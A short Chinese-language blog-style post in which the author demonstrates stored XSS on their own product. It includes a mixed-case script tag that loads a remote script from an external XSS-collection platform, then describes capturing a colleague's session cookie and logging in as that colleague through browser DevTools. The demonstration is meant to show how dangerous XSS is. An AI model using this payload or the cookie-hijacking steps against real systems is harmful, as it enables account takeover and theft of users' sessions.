今天在测试自己产品的时候,发现有个地方输入框执行javascript脚本。
正好趁着这个机会给小伙伴们演示xss的危害。
首先在XSS平台上搭建一个测试项目。
我用的是http://xss.这个的免费平台
项目配置选择默认就可以了。
然后直接复制平台提供的代码到存在xss漏洞的地方
<sCRiPt sRC=http://xss./10bt></sCrIpT>
保存以后,我让另一个同事登录,并点击这个模块。
这是XSS平台就捕获到cookie信息。
获取到地址和cookie 我就可以直接用浏览器登录了
chrome浏览器,F12修改cookie为获取到的cookie并修改url,回车,登录成功!
就可以直接用同事的账号在我的电脑登录了。